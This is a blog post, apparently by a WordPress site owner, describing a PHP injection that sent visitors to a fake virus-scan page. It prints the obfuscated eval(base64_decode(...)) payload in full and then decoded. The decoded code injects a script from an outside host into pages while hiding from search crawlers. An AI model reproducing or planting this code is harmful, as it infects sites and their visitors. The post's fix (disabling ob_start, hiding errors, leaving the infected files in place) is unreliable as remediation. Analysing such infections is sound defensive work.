hi,my site get hacked with eval(base64_decode( with many times, drive me mad . so i have to find a way to fix it. it’s may not the best way but it work.
What’s happened
That’s what’s happened, when you open the hacked page , it forward you to a another site and show a scan processing image and then tell you your computer have virus , it will guide you to download a virus exe file.But if you go to that page again this will not happen again, it will make you feel you enter a wrong url at first time or make you feel you cleared the virus on your computer .
Find the virus codes
Here is the virus codes in all my host php files:
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5c2IzTnZkSEpoYm1FdVkyOXRMMnB6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9")); |
what’s this codes will do? it will add a something like before $lt;/body>
<script src="http://losotrana.com/js.php"></script> |
This js code will redirect you to another a virus page and set cookies that’s why you will not got the redirect after you visit the hacked page, beacuse it set a cookie so it will not forward you to the virus page again.
How to fix it?
I try to translate the virus codes , so i get the codes as follow
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])) { $GLOBALS['mr_no']=1; if(!function_exists('mrobh')) { if(!function_exists('gml')) { function gml() { if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) { return '<script src="http://losotrana.com/js.php"></script>' ;} return ""; } } if(!function_exists('gzdecode')) { function gzdecode($parm) { $obj1=@ord(@substr($parm,3,1)); $obj2=10; $obj3=0; if($obj1&4){ $obj4=@unpack('v',substr($parm,10,2)); $obj4=$obj4[1]; $obj2+=2+$obj4; } if($obj1&8){ $obj2=@strpos($parm,chr(0),$obj2)+1; } if($obj1&16){ $obj2=@strpos($parm,chr(0),$obj2)+1; } if($obj1&2){ $obj2+=2; } $obj5=@gzinflate(@substr($parm,$obj2)); if($obj5===FALSE){ $obj5=$parm; } return $obj5; } } function mrobh($p) { Header('Content-Encoding: none'); $ra=gzdecode($p); if(preg_match('/\<\/body/si',$ra)) { return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$ra); } else { return $ra.gml(); } } ob_start('mrobh'); } } |
so now , i find the problem, the hacker use the ob_start function to hack the site, so i find a stupid way to fix it while i can’t find the hack source (i didn’t figure out how to make all php not get infected ) . the way i use is disabled the ob_start function in the php.ini, here is my code in the php.ini
safe_mode=on disable_functions =ob_start,mrobh |
after restarted the apache , thank god ! it work even the file have infected with the virus codes.
You may notice after disabled the ob_start function , your wordpress will show the error
"PHP Warning: Cannot modify header information – headers already sent by (output started at ",
don’t worry about it, the wordpress will still work ok, sometimes the ajax may not work well and need update the value with refresh the page , but that’s better than be hacked , let’s removed the warning by add following codes to the php.ini
safe_mode=On error_reporting =-1 display_errors=Off |
after those you need reset the apache server.
Notice: if you are useing godaddy host and use php5 you need change the php.ini to php5.ini in your root folder, also you can’t restart the apache so you need to load to your account and go the manage the host, then find process icon ,click it and then end all web process, after this the php5.ini will take effect .
Thanks for reading
If you have any problem when you remove the virus codes , please leave a comments there , i will try my best to help you . Happy reading!!!